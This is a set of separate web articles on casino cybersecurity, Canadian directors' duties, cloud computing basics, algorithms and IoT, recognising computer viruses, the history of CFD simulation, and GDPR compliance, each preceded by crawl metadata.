<urn:uuid:dd6e242a-74e4-4c2b-8537-4595772e5861>
CC-MAIN-2024-38
https://www.itworldcanada.com/article/oracle-launches-nosql-database/44932
2024-09-15T03:04:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00396.warc.gz
en
0.954113
837
2.515625
3
Cybersecurity in casinos involves more than just protecting customer data; casinos face a variety of threats, including fraud, hacking, and data breaches. To stay ahead of cybercriminals, casinos invest heavily in advanced security measures and continually update their strategies to protect their assets and customers.

Advanced Security Technologies

Casinos, including the leading online gambling sites in Canada, employ a range of cutting-edge technologies to safeguard their operations. Some of these include:

- Encryption: Encryption is a fundamental security measure that renders sensitive data unreadable to unauthorized individuals. Casinos use strong encryption protocols to protect financial transactions, personal data, and communication channels.
- Firewalls and Intrusion Detection Systems (IDS): Firewalls and IDS are essential for monitoring and blocking suspicious activity. They act as barriers between internal networks and external threats, ensuring that unauthorized access attempts are identified and mitigated promptly.
- Multi-Factor Authentication (MFA): MFA adds an extra layer of security by requiring users to provide two or more verification factors. This makes it significantly more difficult for cybercriminals to gain unauthorized access to systems and accounts.
- Biometric Security: Biometric technologies such as fingerprint scanners, facial recognition, and iris scanners are increasingly used in casinos. These technologies provide a higher level of security than traditional password-based systems.
- Artificial Intelligence (AI) and Machine Learning (ML): AI and ML are used to detect and respond to threats in real time. These technologies can analyze vast amounts of data to identify patterns and anomalies that may indicate a cyber threat.

Employee Training and Awareness

In addition to technological solutions, casinos place a strong emphasis on employee training and awareness.
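As an illustration of the MFA factor mentioned above, here is a minimal sketch of the time-based one-time-password scheme (RFC 6238) that many authenticator apps implement. It is a toy, not production code, and the shared secret below is the RFC's published test value:

```python
import hmac
import hashlib
import struct
import time

def totp(secret: bytes, at=None, digits: int = 6, step: int = 30) -> str:
    """Time-based one-time password (RFC 6238) over HMAC-SHA1."""
    counter = int((time.time() if at is None else at) // step)
    msg = struct.pack(">Q", counter)
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# The server and the user's authenticator app share `secret`; a login
# succeeds only if the submitted code matches the current time window.
secret = b"12345678901234567890"
assert totp(secret, at=59) == "287082"  # RFC 6238 SHA-1 test vector
```

Because the code changes every 30 seconds and never travels over email or SMS, a stolen password alone is not enough to log in.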
Employees are often the first line of defense against cyber threats, and their actions can significantly impact the overall security of the organization. Key aspects of this training include:

- Phishing Awareness: Employees are trained to recognize and avoid phishing attempts. This includes understanding the signs of suspicious emails and knowing how to report potential phishing attacks.
- Password Security: Strong password policies are enforced, and employees are educated on the importance of using complex, unique passwords for different accounts. Regular password updates are also mandated.
- Data Handling Procedures: Proper data handling procedures are crucial in preventing unauthorized access and data breaches. Employees are trained on how to securely handle, store, and dispose of sensitive information.
- Incident Response Protocols: Employees are trained on the proper protocols to follow in the event of an incident. This includes knowing how to report incidents, who to contact, and what steps to take to mitigate damage.
- Regular Security Drills: Regular security drills and simulations are conducted to keep employees prepared for potential cyber threats. These drills help ensure that staff members are familiar with procedures and can respond quickly and effectively in the event of an attack.

Continuous Improvement and Collaboration

Casinos understand that cybersecurity is an ongoing process that requires continuous improvement and collaboration. They frequently update their security measures to address new and emerging threats. Collaboration with industry peers, government agencies, and experts is also essential to staying ahead of cybercriminals. Through participation in information-sharing networks and industry forums, casinos can exchange knowledge and best practices. This collaborative approach helps them stay informed about the latest threats and advancements in cybersecurity technology.
Moreover, regular audits and assessments are conducted to identify vulnerabilities and areas for improvement. By staying proactive and vigilant, casinos can ensure they remain one step ahead in the constantly evolving landscape of cybersecurity. In conclusion, the gaming industry must continually evolve its security measures. Casinos employ advanced technologies and emphasize employee training to protect their assets and customers, ensuring a safe and secure gaming environment.
<urn:uuid:4ffacb75-4823-44a7-852c-66eb6079ce13>
CC-MAIN-2024-38
https://www.cyberdb.co/cybersecurity-in-the-gaming-industry-how-casinos-stay-one-step-ahead/
2024-09-16T10:11:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651682.69/warc/CC-MAIN-20240916080220-20240916110220-00296.warc.gz
en
0.936969
749
2.578125
3
The roles and responsibilities of a board of directors in Canada

Canadian corporations are primarily governed by the Canada Business Corporations Act. Corporate law in Canada is similar to corporate law in the United States and other parts of the world, particularly as it pertains to fiduciary duties and conflicts of interest. Canadian board directors are responsible for knowing their duties and responsibilities, and directors who fail to comply with national and local statutes may be held liable for their actions in court. The two primary duties in Canada are fiduciary duties and the Duty of Care.

Canadian Board Directors and Their Fiduciary Duties

Above all, Canadian board directors must place the corporation's interests first. With regard to every decision and duty, board directors must act honestly and in good faith, always putting the interests of the corporation ahead of their own. Board directors may not disclose confidential information about the corporation. Directors who acquire significant business information from others have a duty to share it with the rest of the board. This directive also holds true for calling the board's attention to opportunities in which it may be interested. Similar to other global corporate laws, Canadian board directors aren't allowed to pursue business opportunities for their own benefit that they should be pursuing on behalf of the corporation. Canadian courts are clear on their expectations for board directors and hold them strictly accountable for their actions and their failure to act.

Canadian Board Directors and the Duty of Care

Duty of Care is a board director duty that is internationally accepted and respected. Duty of Care requires board directors to exercise the same care, diligence and skill that a reasonably prudent person would exercise in comparable circumstances.
Duty of Care requires board directors to take appropriate steps so that they can make sound, informed decisions. This duty requires them to leave no stone unturned in gathering all available information and to assess that information critically before making decisions or recommending decisions to the board. Canadian corporate law assumes that board directors will seek input from the recommendations of management and other corporate advisors and will test that information. Canadian regulatory authorities require all board directors to abide by the Duty of Care. Board directors with special skills or experience may be expected to apply those skills when making decisions that affect the corporation and may be held to a slightly higher standard in certain situations.

Canadian Board Directors and the Duty to Manage

In addition to fiduciary duties and the Duty of Care, the Canada Business Corporations Act outlines board directors' Duty to Manage. This statute outlines the duties that board directors must accept, as well as matters that they must refrain from participating in. The law specifically states: "Subject to any unanimous shareholder agreement, the directors shall manage, or supervise the management of, the business and affairs of a corporation." Canadian corporate law requires board directors to provide annual statements to the shareholders. They must also abide by all statutes for corporations, including laws for employment, tax and other matters. Canadian board directors should also be advised about matters that are solely their responsibility. Canadian law doesn't allow them to delegate certain matters.
In specific terms, board directors may not delegate the following responsibilities:

- Submission of questions to shareholder votes
- Authorization of an issuance of securities
- Declaration of dividends
- Approval of financial statements, management proxy circulars and takeover bid circulars
- Adoption, amendment or repeal of corporate bylaws

Canadian Board Directors Must Avoid Conflicts of Interest

In the past, Canadian law prohibited board directors from having any kind of conflict of interest. The laws have changed to allow for conflicts of interest as long as board directors disclose the conflict and abstain from discussions and votes on matters where there is a personal or professional conflict.

Failure to Comply With Legal Duties Subjects Board Directors to Personal Liability

Canadian corporate law and case law state that board directors may be held personally liable for poor decision-making as well as for failing to act in circumstances where action was required. This is because a breach of fiduciary and statutory duties is illegal. A board of directors may not allow the corporation to act outside of its authority, which is another matter for which board directors may be held liable. Courts will hold board directors liable for infractions that they commit as individual directors as well as those they make on behalf of the corporation.
In addition, Canadian courts will hold board directors personally liable for failing to perform other duties, such as:

- When the corporation fails to act
- When board directors fail to fulfill their responsibilities
- When board directors fail to provide proper oversight over the corporation

Directors and Officers Insurance Provides Limited Indemnification for Canadian Board Directors

Most Canadian corporations purchase Directors and Officers insurance policies to protect board directors from liabilities that they may face in the course of their duties. Board directors should be aware that Directors and Officers policies carry limits and exclusions. Insurance policies have upper limits, so board directors need to review Directors and Officers policies to make sure the limits are high enough to protect them. Directors and Officers policies also contain exclusions for circumstances where board directors fail to act consistently with their fiduciary duties; in the event of a claim, insurance companies will verify that board directors acted lawfully. Canadian corporations often include director indemnity provisions in their bylaws.

Basic Responsibilities of Canadian Board Directors Are Part of Good Corporate Governance

Canadian laws are quite similar to the laws for corporations in the United States and many other parts of the world. The laws are clear and form the basis for good corporate governance. Essentially, board directors need to be vigilant about performing their fiduciary duties and Duty of Care. They need to be aware that these duties apply to their actions, as well as their failure to act. Finally, Canadian board directors need to have a good understanding of the liabilities that accompany board directorship and compare them with the coverage, limitations and exclusions that are inherent within D&O insurance policies.
<urn:uuid:c1cb8a2c-f6dd-4d5e-a4b4-a668bddbbb1c>
CC-MAIN-2024-38
https://www.diligent.com/resources/blog/the-roles-and-responsibilities-of-a-board-of-directors-in-canada
2024-09-18T22:06:50Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00096.warc.gz
en
0.962713
1,230
2.625
3
The cloud has been an IT buzzword for a long time now, but a lot of people still don't fully understand what the cloud is, or how it can be used to help their company.

Official Definition - If you Google "cloud computing" you'll get the following definition: "the practice of using a network of remote servers hosted on the Internet to store, manage, and process data, rather than a local server or a personal computer." Still not totally clear? It's okay, most people are still confused by this definition. Here's a better way of explaining cloud computing: it means using computers hosted on remote servers to run applications and store data. The data is still readily available and can be easily accessed, but it won't be stored locally on your computer.

How It Works - When you use cloud computing you'll pay a service provider a monthly fee based on the amount of data you're using. In most cases, you pay for only the data and computing power you use, just like paying your utility bill. This gives customers flexibility and can save money.

What's in the Cloud - You can find almost any software application you need inside the cloud, because the cloud is just a computer located somewhere else. So, if an application will run on your local machine, it will most likely run in the cloud. This allows you to customize the cloud to your preferences in order to meet your specific needs.

The Bottom Line - Since the majority of the computing happens offsite, using the cloud can save money by reducing breakdowns and the need for maintenance. Your local computers will also run much more efficiently because they won't be bogged down with data and large applications.
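The utility-style billing described above can be illustrated with a toy calculation. The rates here are invented for the example and do not reflect any real provider's pricing:

```python
# Hypothetical pay-per-use rates (not real provider pricing).
STORAGE_RATE_PER_GB = 0.023   # dollars per GB-month of storage
COMPUTE_RATE_PER_HOUR = 0.05  # dollars per instance-hour of compute

def monthly_bill(storage_gb: float, compute_hours: float) -> float:
    # Bill only for what was actually used, like a utility meter:
    # no usage means no charge.
    return round(storage_gb * STORAGE_RATE_PER_GB
                 + compute_hours * COMPUTE_RATE_PER_HOUR, 2)

# 200 GB stored plus 300 instance-hours of compute in a month:
print(monthly_bill(200, 300))  # 19.6
```

Scaling up or down simply moves the meter; there is no hardware to buy or retire, which is the flexibility the article describes.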
<urn:uuid:1ba3d6f2-e125-41ff-aa6e-26d960980fcd>
CC-MAIN-2024-38
https://www.jdyoung.com/resource-center/posts/view/44/crash-course-in-cloud
2024-09-18T21:01:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00096.warc.gz
en
0.924137
369
3.15625
3
With an expected 20.8 billion connected things in existence by 2020, these devices are producing data at an astonishing rate here in the UK. The Internet of Things (IoT) is having an increasing impact upon our ever-evolving lives. However, what many take for granted is the fact that algorithms are at the heart of the devices generating this data. Algorithms are essential to the running of everyday products, from the brakes in your car to trades on the stock exchange, creating our economy's secret weapon of success, and of mass destruction in equal measure, if risks aren't mitigated. Behind the invisible cogs lies hidden value. In the wise words of Peter Sondergaard, Senior VP of Gartner: “Data is inherently dumb – algorithms are where the real value lies. Algorithms define action”. Knowledge is power, and algorithmic data analytics unlocks that power, meaning businesses are able to make the most of data-driven decision management. In turn, they can keep ahead within a competitive landscape where an ill-informed decision could be costly to both reputation and profitability. To ensure the worst doesn't happen, businesses must have experts in place who can analyse and manipulate the right algorithms to produce the most beneficial actionable data and unlock future success. Once a high level of understanding is gained, businesses can capitalise even further by open-sourcing algorithm assets across the marketplace. Many companies may be reluctant to share such assets, but sharing can be useful, as community feedback will help you improve your original algorithmic assets as a whole. An important area we must address is the fact that with the booming algorithmic economy created around IoT, there also comes an increased risk of cyber attacks. Individuals with malicious intent could tamper with algorithms and essentially bring a business to its knees.
Ensuring security is treated as a crucial factor when developing algorithms is imperative to preventing such situations. The complexity of today's threats means it is no longer viable to simply add on a security layer at the end and rely on testing just before the project goes live – this is too little, too late. Given the importance of security in today's interconnected IT landscape, most software development lifecycle models require security checks to be present at all stages. This ensures security is baked in from the beginning, but we also need to recognise that security is not a static attribute of quality: once software is released, its security must be continuously reviewed to ensure that it is not affected by newly discovered vulnerabilities. By doing so, businesses can unlock the true benefits of the increasingly algorithmic economy whilst mitigating the risks. The opinions expressed in this article belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.
<urn:uuid:24b4bc44-79fa-49e3-a655-60112c761005>
CC-MAIN-2024-38
https://informationsecuritybuzz.com/algo-economy-secret-weapon-successful-business/
2024-09-19T23:58:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00896.warc.gz
en
0.947357
578
2.5625
3
How Do I Know if I Have a Computer Virus? [+Video]

Did you know there are millions of computer viruses? There can be one inside your laptop now, waiting to be activated. How do you know it's there? What can you do to remove it? For over 20 years, Intelligent Technical Solutions (ITS) has been helping companies of all sizes protect their business from viruses by providing updates on new risks and recommending appropriate solutions.

Common Signs of Computer Viruses

A computer virus is a packet of malicious software, or malware, designed for one of three reasons: to make money, to steal virtual goods (such as those related to online gaming), or simply to cause trouble. Just like the flu virus or the coronavirus, a computer virus is highly contagious because the code replicates itself and spreads throughout your operating system as well as other computers on the same network. How can you tell if a virus is there? Check for these most common signs:

- Slow performance: booting up or opening programs takes longer than usual.
- Pop-ups: many pop-up windows appear, typically prompting you to click an ad.
- Unexpected new programs: you see unfamiliar applications when you start your computer or when you check your list of active ones.
- Frequent system crashes: the computer crashes or shows error messages because a virus has damaged your hard drive.
- Your hard drive is working overtime by itself and making revving-up noises.
- Your account autonomously sends emails to all your contacts.
- Password changes or missing files: you're locked out of your computer or unable to access certain files.
- Antivirus programs and firewalls fail: programs meant to clean out or block the virus become ineffective.

What's the real evidence that you got hit by a virus? When you've already lost something – money, or control of your data.

What can a computer virus do? A virus attack can directly lead to lost funds.
Money can be diverted or rerouted using stolen passwords, or through an authorizing email sent from an official email account. Imagine a virus acting like an impostor: it pretends it was you and takes what's yours. The theft of online identities has grown exponentially because when hackers access personal information through viruses, they can steal from, lie to, or threaten others in your name. They can take over your online games account and steal virtual goods that have a real-life value attached to them. They can even "fence" these stolen virtual goods to other players and convert them to real money. The virus can also act as a hijacker demanding ransom. In a ransomware attack, you lose access to your files or the computer itself, then receive a threatening message demanding that you pay its creators to get your data back. Even if you avoid ransom by recovering the data from a backup server, you'll spend to restore your computer systems and lose revenue until you're back in operation. Ever heard of "cryptojacking"? That's a recent virus category, and it's both an interesting and growing one. Cryptojacking malware will target your hardware resources – your computer's processor, memory, and graphics card – and use those to mine cryptocurrency (such as bitcoin). Because mining bitcoin is a very hardware-intensive process and requires a lot of energy, it's worthwhile for attackers to create malware that lets them use someone else's equipment and electricity to get bitcoin into their own wallet. As cryptocurrency prices increase, more and more cryptojacking will happen, increasing the risk that your resources will be targeted. Many viruses, though, don't do much harm to your computer aside from slowing down processing speed. What's happening there? The virus is capturing information from your online behavior (think social media spyware) and sending it to people who sell things – products, advocacies, or political messages.
There's a lot of money to be made from online ads, and lots of spyware was created to direct these ads to your computer. That's how a lot of spam emails and pop-up windows end up with you.

How to Prevent Computer Viruses

There are many ways computer viruses spread in our highly connected environment, some more obvious than others. It can happen through attachments in email and text messages, downloading files online, even social media sharing. Our mobile phones are highly portable computers and viruses have been created for those, too. Hardware – infected external drives or USBs – has always been a visible way in. Here's the best rule for avoiding contact with a virus: "If in doubt, don't". Avoid clicking pop-up ads. Do not download files from websites you don't trust. Above all, protect your accounts – here are 3 commonsense ways:

1. Good, secure passwords. Something easy to remember but hard to guess: use a phrase with a special character in between and a number at the end. It should be complex and long.

2. Multi-factor authentication. Whether through a dedicated app or a code sent to your email or mobile phone, a second factor keeps a stolen password from being enough on its own.

3. Caution with email. Email is still the way most computers are compromised: you open an attachment asking you to enable Macros, and with that, you give the hacker full access to your computer. If you're in doubt that an email was sent by someone you know, the best thing to do is call that person to confirm before you open it.

What should you do in case the antivirus program detects a virus? It will give you an action you can take, usually just by clicking a button. But before you do that, message your IT technician first and show him or her the message to report what's happening on your computer. If you have outsourced IT management, you'd have someone to tell you what the real problem is and help you understand how to use the antivirus program.

Can I get an antivirus program online for free? Yes, you can.
We did a quick survey of IT management professionals and these are the ones that got their vote:

"They have some of the best detection. They have some very clever ways of putting in files to, you know, watch for an attack. If this file changes, it's like the canary in the coalmine – you'll immediately know something's wrong."

2. Sophos Security

"Their free antivirus programs are very good, especially their mobile one. They do very good analysis after the fact and they have industry integration."

"It's fallen out of favor because it's Russian. But unless you were NASA or you had state secrets, it's still one of the best ones out there."

Should my small business rely on these free antivirus programs? According to IT management professionals, no. The free versions leave a lot of gaps, and an IT team would have to add a lot of (paid) software to close them. Statistics show that while everybody was working from home due to the coronavirus, virus infections on home computers spiked – even more than malware attacks on office networks declined. Business computers are more likely to have a good, paid-for antivirus program than home computers, and if home computers are used to link to the office network, there's an increased risk of a breach in system security. The expert advice is to pay a little bit of money to find something that works. And depending on the size of the business, it may be a good idea to get cyber-liability insurance, too. In case the antivirus system fails, maybe the insurance can cover 75% of the loss. It's highly worthwhile.

Should I invest in an antivirus program or managed services? Are there data security regulations in your industry? Then it makes even more sense to invest in paid antivirus programs or IT management services. If you're obligated to protect data confidentiality and you're compromised, you're no longer able to guarantee confidentiality and you may have to make a public statement.
You’ll have regulatory, reputational, as well as ethical issues, so make sure your customers can continue to trust you with their data. Viruses happen but they’re not an excuse for a breach -- especially now that you know how to identify and to protect yourself against them.
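The passphrase advice from the prevention tips earlier (a long phrase with a special character and a trailing number) can be turned into a toy checker. The thresholds below are assumptions for illustration, not an official standard:

```python
import re

def passes_guidelines(password: str) -> bool:
    # Toy check for the passphrase advice above: long, with a
    # special character somewhere, and a digit at the end.
    # Real policies should also check against known-breached lists.
    return (
        len(password) >= 12                                   # complex and long
        and re.search(r"[^A-Za-z0-9]", password) is not None  # a special character
        and password[-1].isdigit()                            # a number at the end
    )

assert passes_guidelines("correct-horse-battery7")
assert not passes_guidelines("short7")
```

A checker like this catches the obvious misses; pairing it with multi-factor authentication, as the article recommends, covers the cases a password policy cannot.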
<urn:uuid:f5a67338-8a5d-45b5-8be9-ccc3b9ff0814>
CC-MAIN-2024-38
https://www.itsasap.com/blog/how-do-i-know-if-i-have-a-computer-virus
2024-09-08T00:51:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00196.warc.gz
en
0.942917
1,773
2.84375
3
In this special guest feature from Scientific Computing World, Bill Clark, executive vice president of CD-adapco, considers the successes of computer-aided engineering through the “three ages of CFD.” Computational Fluid Dynamics (CFD) is about solving difficult engineering problems, using expensive software, enormous computing resources, and highly trained engineers. If the problems weren’t difficult, then it is doubtful that anyone would devote so much time and money to solving them. From the perspective of a modern engineer, it would be easy to assume that this desire to apply simulation technology to complex problems is a recent concern; that only today are we able to contemplate solving tough industrial problems, armed with a complex array of multi-physics simulation tools. This is a misconception. Twenty or so years ago, commercial CFD was born from a desire to solve problems involving turbulence, heat transfer, and combustion, based on the vision of a small group of pioneering researchers who were able to see beyond the meagre computing resources available at the time, and to develop the techniques and methods that would ultimately revolutionize engineering. CFD meshes took weeks, or even months, to construct, usually by a process of ‘hand-meshing’ by which an engineer (usually PhD-qualified) painstakingly built up meshes vertex-by-vertex. Although ‘automatic meshing technology’ was starting to become available in the early 90s, it was far from reliable, particularly when it came to defining layers of prismatic cells that were required to accurately capture boundary layers. Another issue with the so-called ‘automatic meshing’ technology of the day, is that it tended to generate more cells than the meagre computing resources of the time could handle. In 1994, I can remember submitting a Star-CD simulation that consisted of 750,000 cells for the first time, and fully expecting smoke to start flowing from the large Unix box that sat under my desk. 
The timescales required meant that analyzing multiple design variations was impractical. This was the ‘first age’ of CFD. Getting a simulation result at all was difficult. CFD was usually deployed at the end of the design process, as a final verification, or for troubleshooting purposes, when everything else had failed. The arrival of cheap Linux computers reduced parallel licensing costs and the continually improving simulation technology opened up the ‘second age of CFD’, in which CFD engineers could reliably provide simulation results within reasonable timescales. Consequently, engineering simulation began to establish itself as the core part of the design process, occurring earlier and earlier and providing a constant stream of simulation data that could be used to drive design decisions. Increasingly, simulation began to displace experimentation as a way of verifying designs. The problems that we could solve expanded beyond the core CFD disciplines of fluid mechanics and heat transfer, as we began to consider problems that involved ‘fluid-structure interaction’, multiphase flow, and chemical reaction. With a little engineering ingenuity, there were very few problems that engineering simulation couldn’t offer some insight to. Which brings us to today, and the dawn of the ‘third age of CFD’, where lines between CFD and structural mechanics are becoming so blurred that it makes little sense calling it ‘CFD’ at all. An uncomfortable truth about modern engineering is that there really are no easy problems left to solve. In order to meet the demands of industry, it’s no longer good enough to do ‘a bit of CFD’ or ‘some stress analysis’. Complex industrial problems require solutions that span a multitude of physical phenomena, which often can only be solved using simulation techniques that cross several engineering disciplines. What our customers are really asking for is the ability to ‘see the big picture’. 
Simulating whole systems rather than just individual components, taking account of all of the factors that are likely to influence the performance of their product in its operational life. In short, to simulate the performance of their design in the context that it will actually be used. Whereas previous generations of engineers could take some comfort in the 'safety net' of extensive physical testing to rescue them from the occasional poor prediction, CAE is increasingly the victim of its own success as simulation continues to displace hardware testing as industry's verification method of choice. Although this increased confidence in simulation is well-deserved (and has been hard-earned through many years of successful prediction), it brings with it a great deal of pressure to 'get the answer right' every time. An important part of this is 'automated design exploration', in which the simulation results automatically drive design improvements, with minimal input from the engineer (other than defining the initial problem and design constraints). With this approach, CFD is used to compile databases of simulation results that explore the complete range of usage scenarios, or it is tied to optimization technology (such as our HEEDS software) to determine the best solution to a given problem automatically. Such is the magnitude of change in the past two decades of simulation technology that it would be foolish to speculate what might be happening 20 years from now. Whatever those changes are, I hope that SCW will still be around to report them.
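The 'automated design exploration' loop described above can be caricatured in a few lines. The objective function and the search strategy here are invented stand-ins; real tools such as HEEDS use far more sophisticated optimizers driving actual CFD solves:

```python
import random

def simulate(design: float) -> float:
    # Stand-in for an expensive CFD run: returns a performance
    # metric to minimize (say, drag). The quadratic is invented
    # purely for this demo.
    return (design - 2.5) ** 2 + 0.1

def explore(lo: float, hi: float, budget: int = 200, seed: int = 0) -> float:
    # Toy automated design exploration: sample candidate designs
    # within the allowed range and keep the best-performing one,
    # with no engineer in the loop beyond setting the constraints.
    rng = random.Random(seed)
    return min((rng.uniform(lo, hi) for _ in range(budget)), key=simulate)

best = explore(0.0, 5.0)
assert abs(best - 2.5) < 0.5  # the loop homes in on the optimum
```

The engineer's role reduces to defining the problem, the design range, and the budget of simulations, exactly the shift the article describes.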
<urn:uuid:685e8cb5-e9ce-48c5-b713-16ddd35b16f1>
CC-MAIN-2024-38
https://insidehpc.com/2014/09/past-present-future-engineering-simulation/
2024-09-09T05:55:05Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00096.warc.gz
en
0.964863
1,109
2.890625
3
The General Data Protection Regulation (GDPR) is the world's most important set of rules about personal data protection. Compliance demonstrates to your customers and partners that your organization has followed the law to protect the integrity of personal data; non-compliance may result in security breaches, steep fines, and a poor brand reputation. Read on to learn the origin of the GDPR, the principles of data processing and data privacy, and how your organization can become compliant. The GDPR originated in the European Union and is the result of an evolution of general privacy regulations. According to the International Association of Privacy Professionals, legislation about personal data protection began ramping up in the 1980s. In 1995, the European Data Protection Directive came into effect and detailed rules for personal data protection and sharing. In 2009, the European Commission started a conference based on new challenges for data privacy, given modern communication methods and technologies like cloud computing; the goal was eventually to reform the 1995 rules. The GDPR officially came into effect in May 2018. While the GDPR originated in the EU, it applies to organizations anywhere, including the US, as long as they collect or target data related to people in the EU. The purpose of the GDPR is to regulate how companies handle and share personal data. A number of organizations had been collecting and sharing their consumers' personal information without consent. The GDPR gives consumers more agency over how they share their personal data with organizations. Companies must adhere to specific standards when they collect, manage, and store personal data. They also have to inform their customers about their data collection and usage and get their consent. The following summarizes the seven GDPR principles related to processing personal data. Each principle ensures compliance with data privacy and protection.
The purpose of GDPR compliance is to ensure data privacy and protection. An organization gains a wealth of benefits if it is GDPR compliant. According to TechTarget, being GDPR compliant is a key differentiator for businesses. Compliance can help an organization streamline and improve critical business functions. One major advantage is proving trust and credibility. A GDPR-compliant organization demonstrates to its customers and partners that it has followed the legal best practices for data processing, privacy, and protection. This can also boost an organization's brand reputation. Another advantage is that compliance makes data management and business process management easier. If an organization launches data protection initiatives, it may appoint at least one official to be in charge of data use and compliance issues. That person can identify, track, and map how data flows through the organization. Working toward GDPR compliance may cause an organization to take a closer look at its data processing and lifecycle workflows. It can then spot gaps in security and clean up flawed or obsolete information. Following the GDPR requirements can stave off a good deal of monetary and reputational damage as well as legal hassle. An organization faces enormous consequences if it is not compliant. Penalties depend on the severity and circumstances of the violation. Under the GDPR, non-compliance fines can reach 4 percent of the organization's global annual revenue or €20 million (about $21 million USD), whichever is higher. One of the biggest reported GDPR violations of 2023 was committed by Meta: the Irish Data Protection Commission fined Meta 1.2 billion euros for transferring European users' personal data to the US without proper data protection. Following the requisite protocol for managing personal data can stave off huge penalties. While the GDPR originated in the European Union, its scope is extra-territorial, meaning it also applies to organizations in countries outside the EU.
Here are guidelines specifically for US companies. First, confirm that your organization needs to comply with the GDPR. Determine what personal data you process and whether any of it is from people in the EU. If it is, determine whether the processing activities relate to offering goods or services to the data subjects, whether they pay for them or not. Check Recital 23 to clarify whether your activities fall under the GDPR; odds are good that they do. If they do, continue to the next steps. Consent is one of the most important legal justifications for processing other people's data, and the GDPR defines specific conditions for consent in order to process personal data lawfully. Among them: when processing is based on consent, the controller must be able to demonstrate that the data subject has given it. See GDPR's Article 7 for the conditions for consent, and Article 6 for the lawful bases of processing. The GDPR has a Data Protection Impact Assessment template to use when you plan your project. Implement data security initiatives like end-to-end encryption to reduce the chances of a data breach. You'll be accountable if your third-party vendors violate GDPR requirements; these include email vendors, cloud storage providers, and any other subcontractors that may process personal data. The GDPR details some of the qualifications the management-level data protection officer must have. You must also report data breaches — a data hack or any other exposure of personal data; Article 33 details what a controller must do. Special rules apply to organizations that transfer data to non-EU countries. The European Commission has deemed specific countries, territories, and sectors to have an adequate level of protection, so transfers to them don't need specific authorization; Article 45 explains how the Commission decides adequacy. As communication channels and data sharing multiply, guidance about data processing and sharing will continue to evolve.
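The consent requirement above — the controller must be able to demonstrate that a subject consented to a purpose, and consent must be withdrawable — can be sketched in a few lines of Python. This is a generic illustration of the record-keeping idea, not legal advice and not any particular vendor's API:

```python
from datetime import datetime, timezone

class ConsentRegistry:
    """Minimal record of who consented to what, so a controller can
    demonstrate consent for a given purpose before processing data."""

    def __init__(self):
        self._grants = {}  # (subject_id, purpose) -> ISO timestamp of consent

    def record(self, subject_id, purpose):
        # Store when consent was given, so it can be demonstrated later.
        self._grants[(subject_id, purpose)] = datetime.now(timezone.utc).isoformat()

    def withdraw(self, subject_id, purpose):
        # Consent must be as easy to withdraw as it was to give.
        self._grants.pop((subject_id, purpose), None)

    def can_process(self, subject_id, purpose):
        return (subject_id, purpose) in self._grants

registry = ConsentRegistry()
registry.record("subject-42", "marketing-email")
assert registry.can_process("subject-42", "marketing-email")
registry.withdraw("subject-42", "marketing-email")
assert not registry.can_process("subject-42", "marketing-email")
```

A production system would also log the wording the subject saw and the channel used, since demonstrating consent means showing what was agreed to, not just that a flag was set.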
Confirming compliance with the GDPR may seem like a formidable task. Today, organizations must not only follow the original GDPR but also data privacy laws in different countries. That's why we at Ketch are dedicated to taking the agony out of ensuring your organization's GDPR compliance. The Ketch Data Permissioning Platform lets you set broad policies for how your organization handles data. You can tag every piece of personal data you collect with permits that say how you'll use the data. If developers want to know if it's permissible to share personal data, all they need is a simple query. They can continue their operations without worrying if processing certain data violates privacy laws. You can also perform regulation-specific risk assessments, privacy-protected data mapping, and much more. If you want help to ensure compliance with data regulations, request a demo.
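The data-permissioning idea described above — tag each piece of personal data with the purposes it may be used for, and let developers query before processing — can be sketched as follows. The field and purpose names are hypothetical, and this is a generic illustration of the pattern, not Ketch's actual API:

```python
class DataPermissions:
    """Toy data-permissioning store: each field of personal data carries
    a set of permitted purposes, and code queries it before processing."""

    def __init__(self):
        self._permits = {}  # field name -> set of permitted purposes

    def tag(self, field, *purposes):
        # Attach one or more permitted purposes to a data field.
        self._permits.setdefault(field, set()).update(purposes)

    def is_permitted(self, field, purpose):
        # A simple query: may this field be used for this purpose?
        return purpose in self._permits.get(field, set())

permits = DataPermissions()
permits.tag("email", "account-notifications")
permits.tag("purchase_history", "order-fulfillment", "analytics")

# Developers check before using data for a purpose.
assert permits.is_permitted("purchase_history", "analytics")
assert not permits.is_permitted("email", "marketing")
```

The value of the pattern is that purpose decisions live in one policy store instead of being scattered through application code.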
<urn:uuid:b68fa303-afa9-492e-b59e-0e5dc1f0327d>
CC-MAIN-2024-38
https://www.ketch.com/blog/posts/gdpr-compliance-meaning
2024-09-10T06:48:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00896.warc.gz
